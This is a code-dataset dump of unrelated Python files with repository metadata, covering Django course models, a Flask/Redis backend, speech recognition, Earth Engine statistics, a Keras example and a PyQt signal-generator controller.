email3 = wd.find_element_by_name("email3").get_attribute("value")
address = wd.find_element_by_name("address").get_attribute("value")
return Contact(firstname=firstname, lastname=lastname, id=id,
home=home, mobile=mobile, work=work, phone2=phone2, email=email, email2=email2, email3=email3, address=address)
def get_contact_from_view_page(self, index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text = wd.find_element_by_id("content").text
home = re.search("H: (.*)", text).group(1)
mobile = re.search("M: (.*)", text).group(1)
work = re.search("W: (.*)", text).group(1)
phone2 = re.search("P: (.*)", text).group(1)
return Contact(home=home, mobile=mobile, work=work, phone2=phone2)
|
[
"juliette_n@mail.ru"
] |
juliette_n@mail.ru
|
2cc0955608d1892183da69044d8e2b0b20f5dac9
|
80cd5713fb2d844ee235609911643c43e306da75
|
/resize_category.py
|
eafd2fab720b416d9bf6282e0c412b920d7bdef2
|
[
"Apache-2.0"
] |
permissive
|
aurora-feng/aurora-feng.github.io
|
becd96d8140488d3b75f09780b5d59f028903db4
|
6d65564acabedade72fdda56dbada9c13a3ec99b
|
refs/heads/master
| 2020-06-02T22:02:09.619722
| 2019-06-23T14:26:15
| 2019-06-23T14:26:15
| 191,321,370
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
import os
import shutil
from PIL import Image
from resizeimage import resizeimage
thub_size = (400, 289)
reg_size = (600, 450)
_origin_path = '/Users/zhibin.jiang/Downloads/temp/{cate}/'
new_path = '/Users/zhibin.jiang/Learning/aurora_profolio/img/{cate}/'
def main():
for cate in ['cate_flower', 'cate_life', 'cate_human', 'cate_view', 'cate_painting']:
origin_path = _origin_path.format(cate=cate)
if not os.path.exists(new_path.format(cate=cate)):
os.mkdir(new_path.format(cate=cate))
for image_name in os.listdir(origin_path):
if not image_name.endswith('g'):
continue
image_path = origin_path + image_name
print("Processing: ", image_path)
with open(image_path, 'rb') as f_rb:
with Image.open(f_rb) as image:
prefix, postfix = image_name.split('.')[0].strip('_'), image_name.split('.')[-1]
reg = new_path.format(cate=cate) + '{}.{}'.format(prefix, postfix)
shutil.copy(image_path, reg)
thum = new_path.format(cate=cate) + '{}-thumbnail.{}'.format(prefix, postfix)
thumb = resizeimage.resize_cover(image, thub_size)
thumb.save(thum, image.format)
if __name__ == '__main__':
main()
|
[
"zhibin.jiang@ihandysoft.com"
] |
zhibin.jiang@ihandysoft.com
|
9ac4fffb2f1957b093e87dc961375512e49b038c
|
63821348be843b185ce6887d0f3027686f157164
|
/simplemooc/simplemooc/courses/models.py
|
ef5748d97046fe21cc5a8a1eb470f7ad65860861
|
[] |
no_license
|
sadijrp/simplemooc-course
|
c79c295bbeb0b74b7ad622b5765fefd75274d45b
|
df15539ded0349e0dd8ce17744a03edb99a83ea6
|
refs/heads/master
| 2020-04-16T20:12:11.935589
| 2019-08-06T19:28:10
| 2019-08-06T19:28:10
| 165,890,333
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,208
|
py
|
from django.db import models
from django.urls import reverse
from django.conf import settings
from django.utils import timezone
from simplemooc.core.mail import send_mail_template
class CourseManager(models.Manager):
def search(self, query):
return self.get_queryset().filter(
models.Q(name__icontains=query) |
models.Q(description__icontains=query)
)
class Course(models.Model):
name = models.CharField('Nome', max_length=100)
slug = models.SlugField('Atalho')
description = models.TextField('Descrição', blank=True)
about = models.TextField('Sobre o Curso', blank=True)
start_date = models.DateField(
'Data de ínicio', null=True, blank=True
)
image = models.ImageField(
upload_to='courses/images',
verbose_name='Imagem',
null=True,
blank=True
)
created_at = models.DateTimeField(
'Criado em', auto_now_add=True
)
updated_at = models.DateTimeField(
'Atualizado em', auto_now=True
)
objects = CourseManager()
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('courses:details', args=[self.slug])
def released_lessons(self):
today = timezone.now().date()
return self.lessons.filter(release_date__lte=today)
class Meta:
verbose_name = "Curso"
verbose_name_plural = "Cursos"
ordering = ['name']
class Enrollment(models.Model):
STATUS_CHOICES = (
(0, 'Pendente'),
(1, 'Aprovado'),
(2, 'Cancelado')
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name="Usuário",
related_name="userenrollments",
on_delete=models.PROTECT
)
course = models.ForeignKey(
Course,
verbose_name="Curso",
related_name="courseenrollments",
on_delete=models.PROTECT
)
status = models.IntegerField(
verbose_name="Situação",
choices=STATUS_CHOICES,
default=0,
blank=True
)
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True
)
def active(self):
self.status = 1
self.save()
def is_approved(self):
return self.status == 1
class Meta:
verbose_name = "Inscrição"
verbose_name_plural = "Inscrições"
unique_together = (('user', 'course'),)
class Announcement(models.Model):
course = models.ForeignKey(
Course,
verbose_name='Curso',
on_delete=models.CASCADE,
related_name='announcements')
title = models.CharField('Título', max_length=100)
content = models.TextField('Conteúdo')
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True
)
def __str__(self):
return self.title
class Meta:
verbose_name = 'Anúncio'
verbose_name_plural = 'Anúncios'
ordering = ['-created_at']
class Comment(models.Model):
announcement = models.ForeignKey(
Announcement,
verbose_name='Anúncio',
related_name='comments',
on_delete=models.CASCADE)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name='Usuário',
on_delete=models.CASCADE)
comment = models.TextField('Comentário')
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True
)
class Meta:
verbose_name = 'Comentário'
verbose_name_plural = 'Comentários'
ordering = ['created_at']
class Lesson(models.Model):
name = models.CharField('Nome', max_length=100)
description = models.TextField('Descrição', blank=True)
number = models.IntegerField('Número (ordem)', blank=True, default=1)
release_date = models.DateField('Data de Liberação', blank=True, null=True)
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True)
course = models.ForeignKey(
Course,
verbose_name='Curso',
related_name='lessons',
on_delete=models.CASCADE)
def __str__(self):
return self.name
def is_available(self):
if self.release_date:
today = timezone.now().date()
return self.release_date >= today
class Meta:
verbose_name = 'Aula'
verbose_name_plural = 'Aulas'
ordering = ['number']
class Material(models.Model):
name = models.CharField('Nome', max_length=100)
embedded = models.TextField('Video embedded', blank=True)
file = models.FileField(
upload_to='lessons/materials',
blank=True,
null=True)
lesson = models.ForeignKey(
Lesson,
verbose_name='Aula',
related_name='materials',
on_delete=models.CASCADE)
def is_embedded(self):
return bool(self.embedded)
def __str__(self):
return self.name
class Meta:
verbose_name = 'Material'
verbose_name_plural = 'Materias'
def post_save_announcement(instance, created, **kwargs):
if created:
announcement = instance
subject = announcement.title
context = {
'announcement': announcement
}
template_name = 'courses/announcement_mail.html'
enrollments = Enrollment.objects.filter(
course=announcement.course,
status=1
)
for enrollment in enrollments:
recipient_list = [enrollment.user.email]
send_mail_template(subject, template_name, context, recipient_list)
models.signals.post_save.connect(
post_save_announcement,
sender=Announcement,
dispatch_uid='post_save_announcement')
|
[
"sadijrp@gmail.com"
] |
sadijrp@gmail.com
|
70b26f8c54d7d8eb40302ee17781e84cf5a56c14
|
3eed35781bc9f63c33586f8f2abdcfde8e7bd9bd
|
/core/config.py
|
a611537caf766270a7a9177c53ac7ff1fc7ec356
|
[] |
no_license
|
peilion/OP-backend
|
6e192f2592c0ae526f69f279bd0ba3023af0e593
|
13f7499d8727dcf5c866870450b29c829b32b4e6
|
refs/heads/master
| 2022-12-13T11:41:33.575868
| 2020-08-24T02:00:28
| 2020-08-24T02:00:28
| 207,509,587
| 14
| 0
| null | 2022-12-08T06:54:48
| 2019-09-10T08:49:47
|
Python
|
UTF-8
|
Python
| false
| false
| 673
|
py
|
import os
API_V1_STR = "/api/v1"
SECRET_KEY = os.urandom(32)
DATABASE_CONNECTION_URL = os.getenv("DATABASE_CONNECTION_URL")
DATABASE_NAME = os.getenv("DATABASE_NAME")
ACCESS_TOKEN_EXPIRE_MINUTES = 60 * 24 * 8 # 60 minutes * 24 hours * 8 days = 8 days
SERVER_NAME = os.getenv("SERVER_NAME")
SERVER_HOST = os.getenv("SERVER_HOST")
BACKEND_CORS_ORIGINS = "http://localhost:9527,http://123.56.7.137" # a string of origins separated by commas, e.g: "http://localhost, http://localhost:4200, http://localhost:3000, http://localhost:8080, http://local.dockertoolbox.tiangolo.com"
PROJECT_NAME = "Oil Pump Data Api"
TIME_DOMAIN_SUB_SAMPLED_RATIO = 4
TIME_DOMAIN_DECIMAL = 3
|
[
"peilun.fu117@gmail.com"
] |
peilun.fu117@gmail.com
|
6eb6b15fb8fac618ec7f278c5b9d56ac454ae588
|
da29482e5394e2e5398351be4cee818d73b5b163
|
/backend/backend.py
|
7675078cda620a1e88965cb9cc23eacc002edfb9
|
[] |
no_license
|
Ishikawa7/kubernetes-simple-flask-app
|
134ecaedf82941e4b9a137711d15f5eacfdbe518
|
33cfbcbbdc5085603d2544da913be5e84d234437
|
refs/heads/master
| 2022-08-26T05:17:50.409559
| 2022-08-10T08:14:14
| 2022-08-10T08:14:14
| 217,856,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 759
|
py
|
from flask import Flask, request
import http.client
import redis
app = Flask(__name__)
# TODO Set the redis host
r = redis.Redis(host="redis-cluster-ip-service")
def count_primes(num = 100000):
if num < 2:
return 0
primes = [2]
for n in range(2, num + 1):
for p in primes:
if n % p == 0:
break
else:
primes.append(n)
return str(len(primes))
@app.route("/")
def hello():
return "Backend running"
@app.route('/bep1')
def cpuintensive():
return count_primes()
@app.route('/bep2', methods=['POST'])
def redisCall():
r.Set("bodyReceived",str(request.data))
return("Successfull!")
if __name__ == "__main__":
app.run(debug=True,host='0.0.0.0', port=5000)
|
[
"davidegrimaldi92@gmail.com"
] |
davidegrimaldi92@gmail.com
|
401a554684fd8f2a37ab1c1f51825125ca46d77c
|
e7de9caf500cb10b726481161f86fb012477b66f
|
/contacto/migrations/0002_alter_contacto_email.py
|
63a518a0b0b2fc12015489dfe152222dc5265369
|
[] |
no_license
|
jdtorres1997/testUseIt
|
a0b7a95e13a64e1bfbc4c62bec048e2be038eebf
|
7646125aa50c3f2952fbdcb7ad5251d6684dbf58
|
refs/heads/main
| 2023-08-14T05:59:36.228937
| 2021-10-12T03:20:10
| 2021-10-12T03:20:10
| 415,361,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
# Generated by Django 3.2.8 on 2021-10-09 04:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contacto', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='contacto',
name='email',
field=models.EmailField(max_length=254, verbose_name='Correo electrónico'),
),
]
|
[
"juan.torres.canon@correounivalle.edu.co"
] |
juan.torres.canon@correounivalle.edu.co
|
de43a7611f08d4845ec9c811ad030b61c45a7bd1
|
07537f48d33b68e7e4dc2684802c203ccfff9ae1
|
/apps/trader/migrations/0001_initial.py
|
20655c884cdab95495bdfbddde43f523b499a497
|
[
"MIT"
] |
permissive
|
Cabelin-Software-Solutions/e-book-trading-club
|
8108d2974bb69bbd7d3ef64d8646d805a11f4782
|
61750c8e01b2a0f2bb0eca0318c36f4bcc5cf604
|
refs/heads/master
| 2021-01-21T06:05:58.493129
| 2017-08-31T21:13:11
| 2017-08-31T21:13:11
| 101,936,129
| 0
| 0
| null | 2017-08-31T21:13:12
| 2017-08-30T22:54:59
|
Python
|
UTF-8
|
Python
| false
| false
| 887
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-28 05:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"artemiocabelin@gmail.com"
] |
artemiocabelin@gmail.com
|
f8adcc98d428525a52292932206cab9b028763fb
|
c9eb50509cec04137bcd4622039678243c285830
|
/arnold/sensors/microphone.py
|
63ccc7590de2f43ea68c9842278a31a36a8eb309
|
[
"BSD-3-Clause"
] |
permissive
|
hacklabza/arnold
|
63ef9520cd40128330adc987130de9364484cd44
|
d51f6b751ce6530650555cd33bf707f00b60af59
|
refs/heads/develop
| 2023-07-29T13:48:37.442896
| 2021-10-28T06:00:50
| 2021-10-28T06:00:50
| 149,396,000
| 2
| 0
|
BSD-3-Clause
| 2023-07-18T04:04:41
| 2018-09-19T05:18:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,764
|
py
|
import logging
import os
from typing import Optional
import speech_recognition
from arnold import config
_logger = logging.getLogger(__name__)
class Microphone(object):
"""A sensor class which initialises the microphone component and add speech
recognition and command parsing to Arnold.
Args:
card_number (int, optional): The microphone device card number.
device_index (int, optional): The microphone device index.
sample_rate (int, optional): The microphone sample rate.
phrase_time_limit (int, optional): How long to listen for a phrase.
energy_threshold (int, optional): The microphones energy threshold.
google_api_key_path (str, optional): The file path to the json api key.
"""
def __init__(
self,
card_number: Optional[int] = None,
device_index: Optional[int] = None,
sample_rate: Optional[int] = None,
phrase_time_limit: Optional[int] = None,
energy_threshold: Optional[int] = None,
google_api_key_path: Optional[int] = None
) -> None:
self.config = config.SENSOR['microphone']
# USB microphone adapter config
self.card_number = self.config['card_number'] if card_number is None else card_number
self.device_index = self.config['device_index'] if device_index is None else device_index
self.sample_rate = sample_rate or self.config['sample_rate']
# Setup logging
self._logger = _logger
# Speech recognition
self.phrase_time_limit = phrase_time_limit or self.config['phrase_time_limit']
self.speech_recogniser = speech_recognition.Recognizer()
self.speech_recogniser.energy_threshold = (
energy_threshold or self.config['energy_threshold']
)
# Google Cloud API integration
try:
self.google_api_key_path = (
google_api_key_path or config.INTEGRATION['google_cloud']['key_path']
)
except KeyError:
self.google_api_key = None
def listen(self) -> speech_recognition.AudioData:
"""Records the voice command from the microphone and returns the audio
bite.
Returns:
AudioData: an audio data object of the voice command recorded.
"""
with speech_recognition.Microphone(sample_rate=self.sample_rate) as source:
self.speech_recogniser.adjust_for_ambient_noise(source)
self._logger.info('Ready to receive voice commands.')
voice_command = self.speech_recogniser.listen(
source, phrase_time_limit=self.phrase_time_limit
)
return voice_command
def recognise_command(self, voice_command: speech_recognition.AudioData) -> Optional[str]:
"""Takes a voice command audio bite as input and calls the google voice
to text service to determine the text command which can be parsed.
Args:
voice_command (speech_recognition.AudioData): Recorded voice command
Returns:
Optional[str]: the text command as processed by google speech
recognision engine.
"""
if self.google_api_key_path:
google_cloud_credentials = ''
with open(os.path.join(config.ROOT_DIR, self.google_api_key_path), 'r') as file:
google_cloud_credentials = file.read()
return self.speech_recogniser.recognize_google_cloud(
voice_command,
credentials_json=google_cloud_credentials,
language='en-ZA'
)
else:
self._logger.error(
'Can\'t proceed. Google Cloud API key not found.'
)
return ''
|
[
"jpbydendyk@gmail.com"
] |
jpbydendyk@gmail.com
|
8da6237185e6503c1a44b84a23ce071fc75a6451
|
f9281982adad378b6c87b4d274aed131e427b1ac
|
/product.py
|
f4f0a3950b9b807af7a9d5f78c7520e4169f8116
|
[] |
no_license
|
AdamDonna/dius-code-challenge
|
fbc6fc569a8758b3db3da45d2a8c60852ec71d47
|
bd0487dc3e36c23f64551f7793779d64ae4ca618
|
refs/heads/master
| 2022-12-13T10:39:05.451902
| 2020-09-05T05:34:15
| 2020-09-05T05:34:15
| 293,010,172
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 882
|
py
|
class BaseProduct:
sku = None
price = None
name = None
__subclass_map__ = {}
@classmethod
def register_product(cls):
cls.__subclass_map__[cls.sku] = cls
def __init_subclass__(cls, **kwargs):
"""Register the class in the list of products we have"""
super().__init_subclass__(**kwargs)
cls.register_product()
@classmethod
def get_catalog_product(cls, sku):
"""Get the product in the catalog"""
return cls.__subclass_map__.get(sku)
class SuperIpad(BaseProduct):
sku = 'ipd'
price = 549.99
name = 'Super iPad'
class MacbookPro(BaseProduct):
sku = 'mbp'
price = 1399.99
name = 'MacBook Pro'
class AppleTV(BaseProduct):
sku = 'atv'
price = 109.50
name = 'Apple TV'
class VGAadapter(BaseProduct):
sku = 'vga'
price = 30.00
name = 'VGA adapter'
|
[
"adamdonaghy1994@gmail.com"
] |
adamdonaghy1994@gmail.com
|
2dbfcec6679b3a1d5e552490860e8eae8fee6a3c
|
8ca045c0b94729222e8f3ffe184c0d4f564418c4
|
/Image/band_stats.py
|
5efa9b90869435a090e34c208388ef65ac1eac1a
|
[
"MIT"
] |
permissive
|
levi-manley/earthengine-py-notebooks
|
bc77632ca22ca85c0092c18f1eb8321abfbe874a
|
f5a888ddb6834f164e7399b20c683fb9cf604465
|
refs/heads/master
| 2021-01-02T12:17:27.974005
| 2020-02-09T02:59:20
| 2020-02-09T02:59:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,615
|
py
|
'''
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Image/band_stats.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Image/band_stats.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Image/band_stats.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Image/band_stats.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
'''
# %%
'''
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The magic command `%%capture` can be used to hide output from a specific cell. Uncomment these lines if you are running this notebook for the first time.
'''
# %%
# %%capture
# !pip install earthengine-api
# !pip install geehydro
# %%
'''
Import libraries
'''
# %%
import ee
import folium
import geehydro
# %%
'''
Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. Uncomment the line `ee.Authenticate()`
if you are running this notebook for the first time or if you are getting an authentication error.
'''
# %%
# ee.Authenticate()
ee.Initialize()
# %%
'''
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
'''
# %%
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
# %%
'''
## Add Earth Engine Python script
'''
# %%
# get highest value
def maxValue(img, scale=30):
max_value = img.reduceRegion(**{
'reducer': ee.Reducer.max(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return max_value
# get lowest value
def minValue(img, scale=30):
min_value = img.reduceRegion(**{
'reducer': ee.Reducer.min(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return min_value
# get mean value
def meanValue(img, scale=30):
mean_value = img.reduceRegion(**{
'reducer': ee.Reducer.mean(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return mean_value
# get standard deviation
def stdValue(img, scale=30):
std_value = img.reduceRegion(**{
'reducer': ee.Reducer.stdDev(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return std_value
dataset = ee.Image('USGS/NED')
dem = dataset.select('elevation')
# dem = ee.Image('srtm90_v4')
vis_params = {'min': 0, 'max': 3000}
Map.addLayer(dem, vis_params, 'NED', False)
roi = ee.Geometry.Polygon(
[[[-120.18204899532924, 38.53481618819663],
[-120.18204899532924, 36.54889033300136],
[-116.75431462032924, 36.54889033300136],
[-116.75431462032924, 38.53481618819663]]])
image = dem.clip(roi)
Map.centerObject(image, 9)
Map.addLayer(image, vis_params, 'DEM')
scale = image.projection().nominalScale()
print("Resolution: ", scale.getInfo())
scale = 30
print("Minimum value: ", minValue(image, scale).get('elevation').getInfo())
print("Maximum value: ", maxValue(image, scale).get('elevation').getInfo())
print("Average value: ", meanValue(image, scale).get('elevation').getInfo())
print("Standard deviation: ", stdValue(image, scale).get('elevation').getInfo())
# %%
'''
## Display Earth Engine data layers
'''
# %%
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
|
[
"giswqs@gmail.com"
] |
giswqs@gmail.com
|
92942d00d79abf7e2bc0aae1efadd4b6ab06f8e4
|
ec876d7c77aecc45e4ba23463ead7d89a4ea44d7
|
/ordersystem/ordersystem/apps/orders/models.py
|
a4f812d87d9211caf31cdca0b4070536e81b9719
|
[] |
no_license
|
xuyunfeng12388/OrederSystem
|
c709da33379fccb471e8c9766ac01cc0122dfd26
|
b033383a1866b39e527f13b36aa027a413a47bdb
|
refs/heads/master
| 2022-12-15T04:50:29.657785
| 2020-03-20T07:07:09
| 2020-03-20T07:07:09
| 248,689,316
| 1
| 0
| null | 2022-11-22T05:24:47
| 2020-03-20T07:02:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,531
|
py
|
from django.db import models
from ordersystem.utlis.models import BaseModel
# Create your models here.
class DinnerTable(BaseModel):
"""餐桌"""
TABLE_STATUS_EMU = {
"有人": 1,
"空闲": 2
}
TABLE_STATUS_CHOICES = (
(1, "有人"),
(2, "空闲")
)
tableName = models.CharField(max_length=25, verbose_name="餐桌名称")
tableKey = models.IntegerField(verbose_name='餐桌代号', default=None, unique=True)
status = models.SmallIntegerField(choices=TABLE_STATUS_CHOICES, default=2, verbose_name="餐桌状态")
class Meta:
db_table = 'tb_dinner_table'
verbose_name = '餐桌信息'
verbose_name_plural = verbose_name
def __str__(self):
return '%s' % self.tableName
class OrderInfo(BaseModel):
"""
订单信息
"""
PAY_METHODS_ENUM = {
"CASE": 1,
"ALIPAY": 2,
"WEICHAT": 3,
}
PAY_METHOD_CHOICES = (
(1, "现金"),
(2, "支付宝"),
(3, "微信")
)
ORDER_STATUS_ENUM = {
"EDIT": 1,
"PREPARE": 2,
"UNPAID": 3,
"FINISHED": 4,
}
ORDER_STATUS_CHOICES = (
(1, "可编辑"),
(2, "正在备菜"),
(3, "待支付"),
(4, "已完成"),
(5, "取消"),
)
order_id = models.CharField(max_length=64, primary_key=True, verbose_name="订单号")
tableKey = models.ForeignKey(DinnerTable, on_delete=models.PROTECT, verbose_name="餐桌代号")
# address = models.ForeignKey(Address, on_delete=models.PROTECT, verbose_name="收获地址")
total_count = models.IntegerField(default=1, verbose_name="商品总数")
total_amount = models.DecimalField(max_digits=10, decimal_places=2, verbose_name="商品总金额")
# freight = models.DecimalField(max_digits=10, decimal_places=2, verbose_name="运费")
pay_method = models.SmallIntegerField(choices=PAY_METHOD_CHOICES, default=1, verbose_name="支付方式")
status = models.SmallIntegerField(choices=ORDER_STATUS_CHOICES, default=1, verbose_name="订单状态")
comment = models.CharField(default=None, verbose_name="订单备注", max_length=1024)
class Meta:
db_table = "tb_order_info"
verbose_name = '订单基本信息'
verbose_name_plural = verbose_name
def __str__(self):
return '%s: %s' % (self.order_id, self.tableKey)
class OrderGoods(BaseModel):
"""
订单商品
"""
SCORE_CHOICES = (
(0, '0分'),
(1, '20分'),
(2, '40分'),
(3, '60分'),
(4, '80分'),
(5, '100分'),
)
order = models.ForeignKey(OrderInfo, related_name='order_goods', on_delete=models.CASCADE, verbose_name="订单")
goods = models.ForeignKey("foods.Foods", on_delete=models.PROTECT, related_name="order_foods", verbose_name="订单商品")
count = models.IntegerField(default=1, verbose_name="数量")
price = models.DecimalField(max_digits=10, decimal_places=2, verbose_name="单价")
evaluate = models.TextField(default="", verbose_name="评价信息")
score = models.SmallIntegerField(choices=SCORE_CHOICES, default=5, verbose_name='满意度评分')
# is_anonymous = models.BooleanField(default=False, verbose_name='是否匿名评价')
is_commented = models.BooleanField(default=False, verbose_name='是否评价了')
class Meta:
db_table = "tb_order_goods"
verbose_name = '订单商品'
verbose_name_plural = verbose_name
|
[
"xuyunfeng12388@163.com"
] |
xuyunfeng12388@163.com
|
92264e50db168c3a7616972a721169c72358ea8f
|
610ac1da64200c109b9ac48d162058fdd85801aa
|
/functions/diffbtwsortsorted1.py
|
7414f4512fc4bedc4ec79e2ebac0b4024a1637d5
|
[] |
no_license
|
rajdharmkar/Python2.7
|
3d88e7c76c92bbba7481bce7a224ccc8670b3abb
|
9c6010e8afd756c16e426bf8c3a40ae2cefdadfe
|
refs/heads/master
| 2021-05-03T18:56:36.249812
| 2019-10-08T00:17:46
| 2019-10-08T00:17:46
| 120,418,397
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 865
|
py
|
#sort() is a list method, doesnot take an argument; syntax: list.sort()
#list.sort() returns a sorted list(but doesnot print)
#sorted(list)is a builtin function that returns a sorted list(does not print)
a = ['c','a','d','b']
b = [3,2,1,4]
print ('before sort(), the value of a = {}'.format(a))
print ('before sort(), the value of b = {}'.format(b))
a.sort()#sorts but doesnot print
print ('after sort(), the value of a = {}'.format(a))#prints sorted list
b.sort()#sorts but doesnot print
print ('after sort(), the value of b = {}'.format(b))#prints sorted list
#print (a.sort())-returns only None
#print(b.sort()): returns only None
c = ['d','a','c','b']
d = [5,2,3,4]
print ('before sorted(), the value of c = {}'.format(c))
c = sorted(c)
print ('after sorted(), the value of c = {}'.format(c))
e = [6,0,3]
print(sorted(e))
f = ['w','c','s','e']
print (sorted(f))
|
[
"rajdharmkar@gmail.com"
] |
rajdharmkar@gmail.com
|
4b6b8f43c24d2b892ba9b2cead0540982d6839a8
|
89504df28f5892a9a1fd14ce2378af14d6b03ede
|
/app/pl/mazurk/ml/keras/getting-started.py
|
e572d92049c5351ea767e83b4ef03c8932148836
|
[] |
no_license
|
kmazur/ml-nanodegree
|
c343bbbd46ec8b4e0de88b7c96f0c7393b539451
|
d00ca3f0e1a3863959cfeb917d5dd8a51c94a5e5
|
refs/heads/master
| 2021-01-17T09:23:22.765880
| 2017-07-24T22:11:06
| 2017-07-24T22:11:06
| 83,983,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
from keras.models import Sequential
from keras.layers import Dense, Activation
model = Sequential()
model.add(Dense(1, input_dim=784, activation='sigmoid'))
model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['accuracy'])
# generate dummy data
import numpy as np
data = np.random.random((1000, 784))
labels = np.random.randint(2, size=(1000, 1))
# train the model, iterating on the data in batches
# of 32 samples
history = model.fit(data, labels, nb_epoch=10, batch_size=32)
print(history.history)
|
[
"mazurkrzysztof.k@gmail.com"
] |
mazurkrzysztof.k@gmail.com
|
1defbe98e5336867810aaabef9e83a7b9aac3395
|
3e4fec214d82b5547df9ff94e163beb9369547f4
|
/new_meas03/RigolDG3000_RMcontroller_pyqt4.py
|
b271ac0775cb4789b4c572dc0c32a12435e2da42
|
[] |
no_license
|
physikier/magnetometer
|
582caf47d3869340cd18a0aaa2d171e37591c79a
|
e9e6bd314d48b4b40ac5a2145b821305dec2d05e
|
refs/heads/master
| 2021-01-21T14:44:11.460815
| 2016-04-30T21:15:02
| 2016-04-30T21:15:02
| 59,505,445
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,742
|
py
|
import hardware.RigolDG3000 as rig
import sys
import numpy
from PyQt4 import QtCore, QtGui, uic
rigol = rig.RigolDG3000("USB0::0x1AB1::0x0588::DG1D124204534::INSTR")
# Main QT Window Class
# The Class which conations all QT Widgets and so on
class ControllerGui(QtGui.QMainWindow):
# controller_utils is an instance of the ControllerUtils class (Singleton)
controller_utils = None
# ui_utils is an instance of the UIUtils class (Singleton)
ui_utils = None
def __init__(self):
super(ControllerGui, self).__init__()
uic.loadUi("./RigolDG3000_FMspec/fm_spec_via_dg3000.ui", self)
ControllerGui.controller_utils = ControllerUtils(self)
ControllerGui.ui_utils = UIUtils(self)
self.controller_utils.get_settings()
# connect the button clicks with the specific functions
self.button_get.clicked.connect(self.controller_utils.get_settings)
self.button_quit.clicked.connect(QtCore.QCoreApplication.instance().quit)
self.checkBox_ch1_active.stateChanged.connect(self.controller_utils.apply_ch1_stat)
self.checkBox_ch2_active.stateChanged.connect(self.controller_utils.apply_ch2_stat)
self.box_ch1_wform.currentIndexChanged.connect(self.controller_utils.apply_ch1_wform)
self.box_ch2_wform.currentIndexChanged.connect(self.controller_utils.apply_ch2_wform)
self.textbox_ch1_freq.editingFinished.connect(self.controller_utils.apply_ch1_freq)
self.textbox_ch2_freq.editingFinished.connect(self.controller_utils.apply_ch2_freq)
self.hscrollbar_ch1_freq.sliderReleased.connect(self.controller_utils.apply_ch1_freq)
self.hscrollbar_ch2_freq.sliderReleased.connect(self.controller_utils.apply_ch2_freq)
self.textbox_ch1_ampl.editingFinished.connect(self.controller_utils.apply_ch1_ampl)
self.textbox_ch2_ampl.editingFinished.connect(self.controller_utils.apply_ch2_ampl)
